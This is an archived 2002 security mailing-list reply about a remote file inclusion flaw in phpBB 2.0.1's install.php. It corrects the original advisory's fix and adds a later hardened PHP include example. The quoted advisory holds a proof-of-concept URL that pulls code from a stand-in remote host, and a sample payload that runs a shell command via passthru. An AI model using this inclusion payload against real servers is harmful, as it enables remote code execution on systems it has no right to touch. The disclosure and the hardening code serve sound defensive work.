Re: malicious PHP source injection in phpBB

From: Jonathan Haase (jlhaaseat_private)
Date: Mon Jun 17 2002 - 14:20:21 PDT


    Note... The suggested fix for this in the php code below is very 
    incorrect and will in fact leave install.php even more wide open 
    than it currently is...
    
    The correct fix to the php code should be to change the line on 
    or about line 28 which reads...
    include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
    
    to read more properly
    
    include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
    
    Thanks,
    
    Jonathan L. Haase
    
    
    On Sunday 16 June 2002 8:29 am, morris Chang wrote:
    > JCC Security Advisory
    > June 16, 2002
    >
    > malicious PHP source injection in phpBB
    >
    > Description
    >
    > phpBB is one of the popular PHP bulletin board systems.
    > When allow_url_fopen = On and register_globals = On in
    > php.ini, phpBB has a vulnerability because install.php contains
    > dangerous code, so an attacker can include any file into the
    > server's PHP code.
    >
    > Impact
    >
    > It's tested on phpBB 2.0.1, but I think all of phpBB 2 is
    > affected.
    >
    > Workaround
    >
    > allow_url_fopen = off and register_globals = off,
    > and if the install is complete, remove or rename install.php.
    > Or in install.php
    > -------install.php------------
    > define('IN_PHPBB', true);
    > $phpbb_root_path='./';
    > ----------------------------
    > Put it
    > -------snip-----------------
    > $phpbb_root_dir='./';
    > ----------------------------
    >
    > Good idea to code that <<PHP_CODE
    > ini_set("register_globals", "Off");
    > ini_set ("allow_url_fopen", "Off");
    > PHP_CODE
    >
    > Tested systems
    >
    > phpBB 2.0.1 Debian GNU/Linux SID(x86)
    >
    > Background
    >
    > We checked the vulnerability with
    > "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and
    > made a sample code, functions_selects.php,
    >
    > --------------------includes/functions_selects.php--------------
    > <? passthru("uname -a"); ?>
    > -----------------------------------------
    >
    > and type the following URL to invoke this sample code.
    >
    > TEST URL :
    > http://URL/install.php?phpbb_root_dir=http://MYBOX/"
    >
    > -------output----------------------------
    > Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686
    > unknown Warning: Cannot add header information - headers
    > already sent by (output started at
    > http://210.117.152.118:6969/includes/functions_selects.php:1)
    > in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
    > on line 182
    >
    > Warning: Cannot add header information - headers already sent
    > by (output started at
    > http://210.117.152.118:6969/includes/functions_selects.php:1)
    > in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
    > on line 183
    >
    > Warning: Cannot add header information - headers already sent
    > by (output started at
    > http://210.117.152.118:6969/includes/functions_selects.php:1)
    > in /home/morris/public_html/tmp/phpBB2/install.php on line 346
    > -----------------------------------------
    >
    > thx for BlackKnight at r0ar
    > ---
    > http://jcc.hackerslab.org(at morris Chang)
    >
    > e-mail : morrisat_private
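The thread shows the defect from both sides: the advisory's include uses a variable ($phpbb_root_dir) that install.php never assigns, so with register_globals=On it is filled from the query string, and the advisory's proposed fix only moves the same problem onto $phpbb_root_path. The block below is an added example, written for this page and not code from phpBB or from either poster. It shows the vulnerable include shape next to a hardened one in PHP 7+ syntax, assuming a Unix-style deployment where the application root is the script's own directory; the helper names resolve_include and unsafe_ini_settings are my own and do not exist in phpBB.

```php
<?php
// Added example (not phpBB's code): hardening the include pattern that the
// advisory describes in phpBB 2.0.1's install.php.
declare(strict_types=1);

/**
 * Resolve $relative beneath $appRoot and return the canonical absolute path,
 * or null if the result is not an existing file inside $appRoot.
 * Rejects URL-style roots (http://, ftp://, php://, data:) and any ".." or
 * symlink escape, because realpath() canonicalises before the prefix check.
 * Assumes Unix paths: a Windows drive letter ("C:") would also be rejected.
 */
function resolve_include(string $appRoot, string $relative): ?string
{
    $scheme = '#^[a-z][a-z0-9+.-]*:#i';
    if (preg_match($scheme, $appRoot) || preg_match($scheme, $relative)) {
        return null; // a stream wrapper is never a legitimate application root
    }
    $root = realpath($appRoot);
    if ($root === false) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare canonical paths; the trailing separator stops /var/www/app
    // from matching /var/www/app-other.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Report which of the settings named in the advisory are enabled, so an
 * install-time script can refuse to run instead of silently trusting them.
 * allow_url_include (PHP >= 5.2) is the directive that governs include() of
 * URLs on current PHP; allow_url_fopen alone was enough on the PHP 4 era
 * builds the advisory tested against.
 */
function unsafe_ini_settings(): array
{
    $enabled = [];
    foreach (['register_globals', 'allow_url_fopen', 'allow_url_include'] as $name) {
        $value = ini_get($name); // false when the directive does not exist
        if ($value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $name;
        }
    }
    return $enabled;
}

// Vulnerable shape (as quoted in the advisory): $phpbb_root_dir is never
// assigned, so with register_globals=On it arrives from ?phpbb_root_dir=...
//   include($phpbb_root_dir . 'includes/functions_selects.' . $phpEx);

// Hardened shape: the root is fixed at deploy time and the request cannot
// influence it; the target is resolved and checked before include.
define('IN_PHPBB', true);
$phpbb_root_path = __DIR__ . '/';
$phpEx = 'php';

if (($bad = unsafe_ini_settings()) !== []) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Refusing to run with ' . implode(', ', $bad) . ' enabled.');
}

$target = resolve_include($phpbb_root_path, 'includes/functions_selects.' . $phpEx);
if ($target === null) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Refusing to include a file outside the application root.');
}
include $target;
```

Two notes on the design. First, the check reports the dangerous settings rather than trying to change them: register_globals is a PHP_INI_PERDIR directive, so the advisory's ini_set("register_globals", "Off") has no effect at request time and the setting has to be changed in php.ini, httpd.conf or .htaccess (and the directive was removed altogether in PHP 5.4). Second, even with register_globals off, the hardened shape still goes through resolve_include, so a future bug that lets request data reach the root variable is caught by the scheme and prefix checks rather than turning back into the file inclusion the advisory demonstrates.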
    



    This archive was generated by hypermail 2b30 : Tue Jun 18 2002 - 14:36:17 PDT